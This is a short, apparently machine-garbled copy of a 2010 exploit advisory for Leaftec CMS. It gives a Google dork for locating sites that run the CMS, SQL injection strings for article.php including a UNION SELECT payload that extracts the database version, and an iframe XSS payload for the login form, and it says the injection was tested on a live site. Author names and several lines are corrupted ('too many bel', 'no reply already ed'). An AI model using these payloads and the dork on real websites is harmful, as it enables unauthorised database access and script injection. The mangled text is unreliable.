Leaftec cms multiple vulnerabilities

# Exploit Title: leaftec cms multiple vulnerabilities

# Date: 21.03.2010

# Author: Valentin H too many bel

# Version:

# Tested on: Debian etch

# CVE:

# Code:

: General information

: Leaftec cms multiple vulnerabilities discovered

: By Valentin H then marshbel

: Valentin@xenuser.org

: Product information

: Name = leaftec cms

: Vendor = leaftec

: Vendor Website = http://www.leaftec.de/

: About the product = http://www.leaftec.de/serv_cms.php

: Affected versions =

: Google dork: e.g. "©2006 leaftec Design"

: Vulnerabilities

#1 SQL Injection

Sadly the CMS is not available for free download but some German companies are using it.

Leaftec cms contains a blog feature which displays written content, file: article. php.

Vulnerable URL:

Http://www.some-cool-domain.tld/article.php? Id = XX

Examples for testing and injecting SQL stuff:

Http://www.some-cool-domain.tld/article.php? Id =

Http://www.some-cool-domain.tld/article.php? Id ="

Http://www.some-cool-domain.tld/article.php? Id = XX + AND + 1 = 2 + UNION + SELECT + 1, 2, 3, 4, 5, concat (version (), 7 --

(Tested on a live website using leaftec cms .)

Bytes --------------------------------------------------------------------------------------------------------

#2 XSS/HTML Code Injection

Several parts of the CMS allow HTML and Java Script code injection, e.g. the login box.

After submitting the form the cms puts a red border around the login and password field

Also implements the injected code into the website.

Example for HTML code:

"> <Iframe src = http://www.google.de> </iframe>

Bytes --------------------------------------------------------------------------------------------------------

: Additional information

: Vendor contacted = 21.03.2010

: Vulnerabilities fixed = no reply already ed

: Solution = Upgrade to version XX or higher if available